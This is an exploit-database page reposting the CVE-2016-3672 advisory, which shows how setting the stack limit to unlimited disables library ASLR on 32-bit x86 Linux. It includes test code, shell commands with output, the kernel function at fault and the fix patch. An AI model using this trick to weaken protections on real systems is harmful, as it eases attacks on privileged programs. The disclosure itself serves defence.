Menu

Search for hundreds of thousands of exploits

"Linux Kernel (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited"

Author

Exploit author

"Hector Marco & Ismael Ripoll"

Platform

Exploit platform

linux_x86

Release date

Exploit published date

2016-04-06

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
Source: http://hmarco.org/bugs/CVE-2016-3672-Unlimiting-the-stack-not-longer-disables-ASLR.html

CVE-2016-3672 - Unlimiting the stack not longer disables ASLR
Authors:	Hector Marco & Ismael Ripoll
CVE:	CVE-2016-3672
Dates:	April 2016


Description

We have fixed an old and very known weakness in the Linux ASLR implementation.
Any user able to running 32-bit applications in a x86 machine can disable the ASLR by setting the RLIMIT_STACK resource to unlimited.

Following are the steps to test whether your system is vulnerable or not:

1) Create a dummy program which shows its memory map:

#include <stdio.h>

int main(int argc, const char *argv[])
{
    char cmd[256];
    sprintf(cmd, "cat /proc/%d/maps", getpid());
    system(cmd);
    return 0;
}

2) Compile it: 

$ gcc show_maps.c -o show_maps        # In a i386 machine
$ gcc show_maps.c -o show_maps -m32   # In a 64-bit machine

3) Run the application to check that ASLR is working

$ for i in `seq 1 10`; do ./show_maps | grep "r-xp.*libc"; done
f75c4000-f7769000 r-xp 00000000 08:01 784726     /lib32/libc-2.19.so
f75db000-f7780000 r-xp 00000000 08:01 784726     /lib32/libc-2.19.so
f7557000-f76fc000 r-xp 00000000 08:01 784726     /lib32/libc-2.19.so
f7595000-f773a000 r-xp 00000000 08:01 784726     /lib32/libc-2.19.so
f7574000-f7719000 r-xp 00000000 08:01 784726     /lib32/libc-2.19.so
f75af000-f7754000 r-xp 00000000 08:01 784726     /lib32/libc-2.19.so
f7530000-f76d5000 r-xp 00000000 08:01 784726     /lib32/libc-2.19.so
f7529000-f76ce000 r-xp 00000000 08:01 784726     /lib32/libc-2.19.so
f75c2000-f7767000 r-xp 00000000 08:01 784726     /lib32/libc-2.19.so
f75fe000-f77a3000 r-xp 00000000 08:01 784726     /lib32/libc-2.19.so


The libc-2.19.so library is mapped at random positions, so, the ASLR is working properly.
Now, we run the same test but setting the stack to unlimited:


$ ulimit -a | grep stack
stack size              (kbytes, -s) 8192
$ ulimit -s unlimited
stack size              (kbytes, -s) unlimited
$ for i in `seq 1 10`; do ./show_maps | grep "r-xp.*libc"; done
5559a000-5573f000 r-xp 00000000 08:01 784726      /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726      /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726      /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726      /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726      /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726      /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726      /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726      /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726      /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726      /lib32/libc-2.19.so


The libc-2.19.so library is mapped at the same position in all executions: the ASLR has been disabled.
This is a very old trick to disable ASLR, but unfortunately it was still present in current Linux systems.

Vulnerable packages

The weakness, IFAIK is present from the first version of current Linux GIT repository. The first version on this resposiroty is Linux-2.6.12-rc2 dated on April 2005. 

Impact

An attacker capable of running 32-bit system applications in a x86 machine is able to disable the ASLR of any application, including sensitive applications such as setuid and setgid. Note that it is not a exploitable vulnerability by itself but a trick to disable the ASLR. This weakness can be use by an attacker when trying to exploit some other bug. Since the i386 is still very used, the number of systems and affected users could be extremely huge. 
The wekaness

The issue arises because the ASLR Linux implementation does not randomize always the mmap base address when the stack size is set to unlimited. Concretely, on i386 and on X86_64 when emulating X86_32 in legacy mode, only the stack and the executable are randomized but not other mmapped files (libraries, vDSO, etc.). And depending in the Linux version, the executable is neither randomized. 

The function to calculate the libraries position when the stack is set to unlimited is mmap_legacy_base():


static unsigned long mmap_legacy_base(void)
{
    if (mmap_is_ia32())
        return TASK_UNMAPPED_BASE;
    else
        return TASK_UNMAPPED_BASE + mmap_rnd();
}


The function doesn't add any random offset when the system is running in a native 32-bit system (i386) or a 32-bit emulated system (x86_32).
Exploit

To exploit this weakness, the attacker just need to set to unlimited the stack and then execute a 32-bit application. Obviously the idea is to execute (attack) privileged applications such as setuid/setgid.
FIX

We have created a patch to fix this issue:


diff --git a/arch/x86/mm/mmap.c b/arch/x86/mm/mmap.c
index 96bd1e2..389939f 100644
--- a/arch/x86/mm/mmap.c
+++ b/arch/x86/mm/mmap.c
@@ -94,18 +94,6 @@ static unsigned long mmap_base(unsigned long rnd)
 }
 
 /*
- * Bottom-up (legacy) layout on X86_32 did not support randomization, X86_64
- * does, but not when emulating X86_32
- */
-static unsigned long mmap_legacy_base(unsigned long rnd)
-{
-   if (mmap_is_ia32())
-       return TASK_UNMAPPED_BASE;
-   else
-       return TASK_UNMAPPED_BASE + rnd;
-}
-
-/*
  * This function, called very early during the creation of a new
  * process VM image, sets up which VM layout function to use:
  */
@@ -116,7 +104,7 @@ void arch_pick_mmap_layout(struct mm_struct *mm)
    if (current->flags & PF_RANDOMIZE)
        random_factor = arch_mmap_rnd();
 
-   mm->mmap_legacy_base = mmap_legacy_base(random_factor);
+   mm->mmap_legacy_base = TASK_UNMAPPED_BASE + random_factor;
 
    if (mmap_is_legacy()) {
        mm->mmap_base = mm->mmap_legacy_base;


The patch enables randomization for the libraries, vDSO and mmap requests on i386 and in X86_32 in legacy mode. We already sent the patch to Linux mantainers and the issue will be not problem in incomming Linux versions: Enable full randomization on i386 and X86_32
Discussion

Although this vulnerability is not exploitable by itself, the truth is that the ASLR protection mechanism is useless on local attacks for i386 and x86_32 systems when the attackers are able to attack applications that they can lauch. 

Hector Marco - http://hmarco.org
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2017-10-23 "Unitrends UEB 9 - http api/storage Remote Root (Metasploit)" remote linux_x86 Metasploit
2017-10-23 "Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit)" remote linux_x86 Metasploit
2017-06-28 "Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation" local linux_x86 "Qualys Corporation"
2017-06-28 "Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation" local linux_x86 "Qualys Corporation"
2017-06-28 "Linux Kernel - 'offset2lib' Stack Clash" local linux_x86 "Qualys Corporation"
2016-09-27 "Linux Kernel 4.6.3 (x86) - 'Netfilter' Local Privilege Escalation (Metasploit)" local linux_x86 Metasploit
2016-04-06 "Linux Kernel (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited" dos linux_x86 "Hector Marco & Ismael Ripoll"
2015-11-19 "Google Chrome - open-vcdiff Out-of-Bounds Read in Browser Process Integer Overflow" dos linux_x86 "Google Security Research"
2015-08-07 "Linux Kernel (x86) - Memory Sinkhole Privilege Escalation" local linux_x86 "Christopher Domas"
2015-04-13 "Samba < 3.6.2 (x86) - Denial of Service (PoC)" dos linux_x86 sleepya
Release Date Title Type Platform Author
2016-04-06 "Linux Kernel (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited" dos linux_x86 "Hector Marco & Ismael Ripoll"
2013-09-30 "glibc and eglibc 2.5/2.7/2.13 - Local Buffer Overflow" local linux "Hector Marco & Ismael Ripoll" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected